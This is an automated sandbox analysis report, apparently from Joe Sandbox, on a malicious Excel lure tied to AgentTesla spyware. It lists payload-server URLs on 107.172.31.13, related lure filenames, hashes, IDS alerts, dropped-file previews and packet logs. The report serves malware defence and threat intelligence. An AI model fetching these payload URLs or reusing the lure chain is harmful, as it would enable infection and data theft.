                                    http://ocsp.entrust.net0Dpowershell.exe, 00000008.00000002.524750374.0000000004FFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.571025263.00000000021D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.520246237.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.628239471.0000000002430000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.628239471.0000000002391000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://drive.google.powershell.exe, 00000008.00000002.519947637.0000000000330000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.519947637.0000000000383000.00000004.00000020.00020000.00000000.sdmptrue
                                      unknown
                                      https://secure.comodo.com/CPS0powershell.exe, 00000008.00000002.524750374.0000000004FFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://schemas.microsoft.cowscript.exe, 00000005.00000003.471806519.0000000002B12000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.472214860.0000000002B13000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        http://107.172.31.13/NIGHTTTTMPDW-constraints.vbsjEQNEDT32.EXE, 00000002.00000002.472683807.0000000003560000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          http://crl.entrust.net/2048ca.crl0powershell.exe, 00000008.00000002.524750374.0000000004FFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          208.95.112.1
                                          ip-api.comUnited States
                                          53334TUT-ASUStrue
                                          107.172.31.13
                                          unknownUnited States
                                          36352AS-COLOCROSSINGUStrue
                                          216.58.212.174
                                          drive.google.comUnited States
                                          15169GOOGLEUSfalse
                                          142.250.186.97
                                          drive.usercontent.google.comUnited States
                                          15169GOOGLEUSfalse
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1540840
                                          Start date and time:2024-10-24 08:57:17 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 5m 37s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                          Number of analysed new started processes analysed:12
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:transferencia interbancaria_66579.xlam.xlsx
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.expl.evad.winXLSX@10/10@3/4
                                          EGA Information:
                                          • Successful, ratio: 75%
                                          HCA Information:
                                          • Successful, ratio: 97%
                                          • Number of executed functions: 50
                                          • Number of non-executed functions: 3
                                          Cookbook Comments:
                                          • Found application associated with file extension: .xlsx
                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                          • Attach to Office via COM
                                          • Active ActiveX Object
                                          • Scroll down
                                          • Close Viewer
                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                          • Execution Graph export aborted for target powershell.exe, PID 3884 because it is empty
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • VT rate limit hit for: transferencia interbancaria_66579.xlam.xlsx
                                          TimeTypeDescription
                                          02:59:02API Interceptor71x Sleep call for process: EQNEDT32.EXE modified
                                          02:59:05API Interceptor372x Sleep call for process: powershell.exe modified
                                          02:59:05API Interceptor6x Sleep call for process: wscript.exe modified
                                          02:59:27API Interceptor7x Sleep call for process: AddInProcess32.exe modified
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          208.95.112.1Orden de Compra No. 78986756565344657.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                          • ip-api.com/line/?fields=hosting
                                          OUTSTANDING PAYMENT STATUS 01199241024.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                          • ip-api.com/line/?fields=hosting
                                          Circular_no_088_Annexure_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                          • ip-api.com/json/?fields=status,country,regionName,city,query
                                          RTGS_UCB_DCCB_docx.htmlGet hashmaliciousHTMLPhisherBrowse
                                          • ip-api.com/json/?fields=status,country,regionName,city,query
                                          aoKTzGQSRP.exeGet hashmaliciousXWormBrowse
                                          • ip-api.com/line/?fields=hosting
                                          7EdXVD16wd.exeGet hashmaliciousXWormBrowse
                                          • ip-api.com/line/?fields=hosting
                                          faBnX3uZqr.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                          • ip-api.com/line/?fields=hosting
                                          NxR7UQaeKe.exeGet hashmaliciousXWormBrowse
                                          • ip-api.com/line/?fields=hosting
                                          yNDotZsd7U.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                          • ip-api.com/line/?fields=hosting
                                          MMsRQ2p7RL.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                          • ip-api.com/line/?fields=hosting
                                          107.172.31.13Comprovante_Swift.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                          • 107.172.31.13/emmmbig.txt
                                          OC 20240813.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                          • 107.172.31.13/latinAmex.txt
                                          pedido de compra.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                          • 107.172.31.13/latinAmex.txt
                                          03286786476_formulario bancario.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                          • 107.172.31.13/latinAmex.txt
                                          Nuevo orden.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                          • 107.172.31.13/latinAmex.txt
                                          OC 20240814.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                          • 107.172.31.13/emmmbig.txt
                                          Orden de compra.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                          • 107.172.31.13/HUHUHUHUHUHUHUHUHUHHUUHUSBY.txt
                                          C#U00f3pia do comprovante de pagamento.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                          • 107.172.31.13/huabandhusband.txt
                                          OC 20240912.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                          • 107.172.31.13/latinAmex.txt
                                          lista de pedido de compra 202400813.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                          • 107.172.31.13/latinAmex.txt
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          ip-api.comOrden de Compra No. 78986756565344657.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                          • 208.95.112.1
                                          OUTSTANDING PAYMENT STATUS 01199241024.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                          • 208.95.112.1
                                          Circular_no_088_Annexure_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                          • 208.95.112.1
                                          RTGS_UCB_DCCB_docx.htmlGet hashmaliciousHTMLPhisherBrowse
                                          • 208.95.112.1
                                          aoKTzGQSRP.exeGet hashmaliciousXWormBrowse
                                          • 208.95.112.1
                                          7EdXVD16wd.exeGet hashmaliciousXWormBrowse
                                          • 208.95.112.1
                                          NxR7UQaeKe.exeGet hashmaliciousXWormBrowse
                                          • 208.95.112.1
                                          yNDotZsd7U.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                          • 208.95.112.1
                                          MMsRQ2p7RL.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                          • 208.95.112.1
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          AS-COLOCROSSINGUSComprobante de pago.xlam.xlsxGet hashmaliciousUnknownBrowse
                                          • 192.3.216.142
                                          Orden de Compra No. 78986756565344657.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                          • 198.46.178.134
                                          Shipping Documents WMLREF115900.xlsGet hashmaliciousLokibotBrowse
                                          • 192.3.176.141
                                          A & C Metrology OC 5457144.xlsGet hashmaliciousUnknownBrowse
                                          • 192.210.215.8
                                          #PO247762.docxGet hashmaliciousRemcosBrowse
                                          • 104.168.7.51
                                          la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                          • 192.3.165.37
                                          la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                          • 107.175.231.193
                                          Logs.xlsGet hashmaliciousLokibotBrowse
                                          • 192.3.176.141
                                          PRODUCT_INQUIRY.jsGet hashmaliciousWSHRatBrowse
                                          • 192.210.215.11
                                          Inv No.248740.xlsGet hashmaliciousUnknownBrowse
                                          • 107.175.229.138
                                          TUT-ASUSOrden de Compra No. 78986756565344657.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                          • 208.95.112.1
                                          OUTSTANDING PAYMENT STATUS 01199241024.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                          • 208.95.112.1
                                          Circular_no_088_Annexure_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                          • 208.95.112.1
                                          RTGS_UCB_DCCB_docx.htmlGet hashmaliciousHTMLPhisherBrowse
                                          • 208.95.112.1
                                          aoKTzGQSRP.exeGet hashmaliciousXWormBrowse
                                          • 208.95.112.1
                                          7EdXVD16wd.exeGet hashmaliciousXWormBrowse
                                          • 208.95.112.1
                                          faBnX3uZqr.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                          • 208.95.112.1
                                          NxR7UQaeKe.exeGet hashmaliciousXWormBrowse
                                          • 208.95.112.1
                                          yNDotZsd7U.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                          • 208.95.112.1
                                          MMsRQ2p7RL.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                          • 208.95.112.1
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          05af1f5ca1b87cc9cc9b25185115607dComprobante de pago.xlam.xlsxGet hashmaliciousUnknownBrowse
                                          • 142.250.186.97
                                          • 216.58.212.174
                                          Orden de Compra No. 78986756565344657.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                          • 142.250.186.97
                                          • 216.58.212.174
                                          Shipping Documents WMLREF115900.xlsGet hashmaliciousLokibotBrowse
                                          • 142.250.186.97
                                          • 216.58.212.174
                                          A & C Metrology OC 5457144.xlsGet hashmaliciousUnknownBrowse
                                          • 142.250.186.97
                                          • 216.58.212.174
                                          #PO247762.docxGet hashmaliciousRemcosBrowse
                                          • 142.250.186.97
                                          • 216.58.212.174
                                          PO NAHK22012FA000000.docxGet hashmaliciousUnknownBrowse
                                          • 142.250.186.97
                                          • 216.58.212.174
                                          PO NAHK22012FA00000.docx.docGet hashmaliciousRemcosBrowse
                                          • 142.250.186.97
                                          • 216.58.212.174
                                          Logs.xlsGet hashmaliciousLokibotBrowse
                                          • 142.250.186.97
                                          • 216.58.212.174
                                          InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                          • 142.250.186.97
                                          • 216.58.212.174
                                          CLOSURE.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 142.250.186.97
                                          • 216.58.212.174
                                          No context
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):4760
                                          Entropy (8bit):4.834060479684549
                                          Encrypted:false
                                          SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                                          MD5:838C1F472806CF4BA2A9EC49C27C2847
                                          SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                                          SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                                          SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):64
                                          Entropy (8bit):0.34726597513537405
                                          Encrypted:false
                                          SSDEEP:3:Nlll:Nll
                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:@...e...........................................................
                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):138934
                                          Entropy (8bit):3.70030805435876
                                          Encrypted:false
                                          SSDEEP:3072:nyb+gt5pqGwHISXRrXhBgnT4aagpkwloeg88CS:zlhibager88CS
                                          MD5:FBE9EE491581B8F2489276B2B438C80B
                                          SHA1:8EEF3B6C29958CB0A91E81DC8568C0FA3CD86D7B
                                          SHA-256:AA4C0EAF54B145282142AF96E5B53F8F98921757636D4C5C54604894C37938DC
                                          SHA-512:59A3DB940F517A8EDC7FB7BE5EBA215D589337F64286A82D359C45AE967D53B9063AD5691D73B12A7F03566F12F065594F61A05270213E81DC5F90E91710F311
                                          Malicious:true
                                          Reputation:low
                                          Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .C.r.e.a.t.e.S.e.s.s.i.o.n.(.w.s.m.a.n.,. .c.o.n.S.t.r.,. .o.p.t.D.i.c.,. .s.u.b.s.i.n.u.o.s.o.)..... . . . .d.i.m. .f.a.r.r.a.c.h.o.F.l.a.g.s..... . . . .d.i.m. .c.o.n.O.p.t. ..... . . . .d.i.m. .f.a.r.r.a.c.h.o..... . . . .d.i.m. .a.u.t.h.V.a.l..... . . . .d.i.m. .e.n.c.o.d.i.n.g.V.a.l..... . . . .d.i.m. .e.n.c.r.y.p.t.V.a.l..... . . . .d.i.m. .p.w..... . . . .d.i.m. .t.o.u.t..... . . . .'. .p.r.o.x.y. .i.n.f.o.r.m.a.t.i.o.n..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m.V.a.l..... . . . .d.i.m. .p.r.o.x.y.U.s.e.r.n.a.m.e..... . . . .d.i.m. .p.r.o.x.y.P.a.s.s.w.o.r.d..... . . . . ..... . . . .f.a.r.r.a.c.h.o.F.l.a.g.s. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l. .=. .0..... . . . .
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:very short file (no magic)
                                          Category:dropped
                                          Size (bytes):1
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3:U:U
                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                          Malicious:false
                                          Preview:1
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:very short file (no magic)
                                          Category:dropped
                                          Size (bytes):1
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3:U:U
                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                          Malicious:false
                                          Preview:1
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:very short file (no magic)
                                          Category:dropped
                                          Size (bytes):1
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3:U:U
                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                          Malicious:false
                                          Preview:1
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:very short file (no magic)
                                          Category:dropped
                                          Size (bytes):1
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3:U:U
                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                          Malicious:false
                                          Preview:1
                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):138934
                                          Entropy (8bit):3.70030805435876
                                          Encrypted:false
                                          SSDEEP:3072:nyb+gt5pqGwHISXRrXhBgnT4aagpkwloeg88CS:zlhibager88CS
                                          MD5:FBE9EE491581B8F2489276B2B438C80B
                                          SHA1:8EEF3B6C29958CB0A91E81DC8568C0FA3CD86D7B
                                          SHA-256:AA4C0EAF54B145282142AF96E5B53F8F98921757636D4C5C54604894C37938DC
                                          SHA-512:59A3DB940F517A8EDC7FB7BE5EBA215D589337F64286A82D359C45AE967D53B9063AD5691D73B12A7F03566F12F065594F61A05270213E81DC5F90E91710F311
                                          Malicious:true
                                          Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .C.r.e.a.t.e.S.e.s.s.i.o.n.(.w.s.m.a.n.,. .c.o.n.S.t.r.,. .o.p.t.D.i.c.,. .s.u.b.s.i.n.u.o.s.o.)..... . . . .d.i.m. .f.a.r.r.a.c.h.o.F.l.a.g.s..... . . . .d.i.m. .c.o.n.O.p.t. ..... . . . .d.i.m. .f.a.r.r.a.c.h.o..... . . . .d.i.m. .a.u.t.h.V.a.l..... . . . .d.i.m. .e.n.c.o.d.i.n.g.V.a.l..... . . . .d.i.m. .e.n.c.r.y.p.t.V.a.l..... . . . .d.i.m. .p.w..... . . . .d.i.m. .t.o.u.t..... . . . .'. .p.r.o.x.y. .i.n.f.o.r.m.a.t.i.o.n..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m.V.a.l..... . . . .d.i.m. .p.r.o.x.y.U.s.e.r.n.a.m.e..... . . . .d.i.m. .p.r.o.x.y.P.a.s.s.w.o.r.d..... . . . . ..... . . . .f.a.r.r.a.c.h.o.F.l.a.g.s. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l. .=. .0..... . . . .
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):165
                                          Entropy (8bit):1.4377382811115937
                                          Encrypted:false
                                          SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                          MD5:797869BB881CFBCDAC2064F92B26E46F
                                          SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                          SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                          SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                          Malicious:false
                                          Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):165
                                          Entropy (8bit):1.4377382811115937
                                          Encrypted:false
                                          SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                          MD5:797869BB881CFBCDAC2064F92B26E46F
                                          SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                          SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                          SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                          Malicious:true
                                          Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          File type:Microsoft Excel 2007+
                                          Entropy (8bit):7.998034175592378
                                          TrID:
                                          • Excel Microsoft Office Open XML Format document (35004/1) 81.40%
                                          • ZIP compressed archive (8000/1) 18.60%
                                          File name:transferencia interbancaria_66579.xlam.xlsx
                                          File size:694'395 bytes
                                          MD5:c2a1f2f11eafc8f0faa2480b44d95d7d
                                          SHA1:4aacb955102f10f5c66089fd097f22a633360383
                                          SHA256:bf04af05000e8205dad105999af809b1031eeb438aff45e36ae9ab416d669002
                                          SHA512:6963c8766864faa40ae1e62f65b412ff0058bfe9138edffb3b56cde9e72d8c00d0ec33bfa138415b43b385d34cb5f915d20962b400b2f61fa69934eb54029322
                                          SSDEEP:12288:nLkIJnX/eKaihIi7qtVJOiyRxxNu7LqdXwig7vVpLwT9vt1sxcjRaFebVO14L:nL7nabvJbG3YLq2igb7kT1t1sUkFeRks
                                          TLSH:8DE423A3047C0DD8A6BFAB214F1C1910E53F6B4EB785291DE166BF7DD2D2BC62204C68
                                          File Content Preview:PK..........WY........D.......[Content_Types].xmlUT...'q.g'q.g'q.g...n.0.E.......H'E....E...4..~...[..*.q...HN......F.43...sz...Zb&.C#..DT.t46.....k.YTT .p1`#.H.......:!U\...])..R.;.@2&.......g...z.sT...'.c(.J]z.q9...<.R.....Ik...7y=.........2.. u...F....
                                          Icon Hash:2562ab89a7b7bfbf
                                          Document Type:OpenXML
                                          Number of OLE Files:1
                                          Has Summary Info:
                                          Application Name:
                                          Encrypted Document:False
                                          Contains Word Document Stream:False
                                          Contains Workbook/Book Stream:False
                                          Contains PowerPoint Document Stream:False
                                          Contains Visio Document Stream:False
                                          Contains ObjectPool Stream:False
                                          Flash Objects Count:0
                                          Contains VBA Macros:False
                                          Author:Mancilla, Jesus
                                          Last Saved By:USER
                                          Total Edit Time:0
                                          Create Time:2022-08-10T18:51:50Z
                                          Last Saved Time:2023-08-08T20:02:56Z
                                          Creating Application:Microsoft Excel
                                          Security:0
                                          Thumbnail Scaling Desired:false
                                          Company:
                                          Contains Dirty Links:false
                                          Shared Document:false
                                          Changed Hyperlinks:false
                                          Application Version:16.0300
                                          General
                                          Stream Path:\x1Ole10NaTIvE
                                          CLSID:
                                          File Type:data
                                          Stream Size:982054
                                          Entropy:5.892999243213154
                                          Base64 Encoded:True
                                          Data ASCII:4 j . . . . n . . M . ~ . % U . . . o Z o . . S . v . D . . B . u b P b . . . . 6 F < % . . . m 8 . . . . L . 3 ) * { E r B { ` q [ . . . c k . i I . . . ^ . K . . . . I A . . . . [ H . W Q S W . . ^ . . . V . . . . . [ Y _ O . . . [ . g V ^ N ! 1 . . . S [ . . . . S S W [ . . V ` . . . . . _ [ [ . u Q Y 9 . T . . . J : Q V ( . . ) + 5 / 8 . . * . ; . . a / 2 : % @ . | z ~ . p . . . : . N r . d } 0 V r N F g O . T L w N . o / 4 . m . . O x A G E g [ q . ? D Q q . q V h v . . m | C L x . . T + g f . Y - \\
                                          Data Raw:34 df 6a 03 02 0d 84 b4 01 6e 01 08 4d cd b8 7e fd ed 2e 25 bc bd 55 10 8b 08 8b 19 be fd f7 6f 5a 81 e6 b2 6f d6 a4 8b 2e 53 ff d5 83 c0 76 ff e0 ce c0 1f 44 e4 07 bf b7 e2 18 ac 42 00 75 fd 62 50 62 e5 80 1a 1a 89 02 f5 bc 05 36 46 3c 25 13 f7 11 11 ca f0 6d 38 dd 8f a2 16 d3 dc 13 1c 4c da ba 33 96 f7 29 2a 7b 45 72 fd a8 42 7b 60 71 81 b7 e4 e1 5b 0d 1d c2 0f eb 63 6b c0 00 69
                                          General
                                          Stream Path:Wr8MkqR0VmHoKtWXydQkseawY49
                                          CLSID:
                                          File Type:empty
                                          Stream Size:0
                                          Entropy:0.0
                                          Base64 Encoded:False
                                          Data ASCII:
                                          Data Raw:
                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2024-10-24T08:59:16.752082+02002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21142.250.186.97443192.168.2.2249167TCP
                                          2024-10-24T08:59:27.937146+02002020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M11107.172.31.1380192.168.2.2249168TCP
                                          TimestampSource PortDest PortSource IPDest IP
                                          Oct 24, 2024 08:59:04.508404016 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:04.514318943 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:04.514385939 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:04.516045094 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:04.521627903 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.176064014 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.176126003 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.176156998 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.176165104 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.176188946 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.176237106 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.176276922 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.176383972 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.176383972 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.176383972 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.176738977 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.176774025 CEST8049165107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:05.176784039 CEST4916580192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:05.176809072 CEST8049165107.172.31.13192.168.2.22
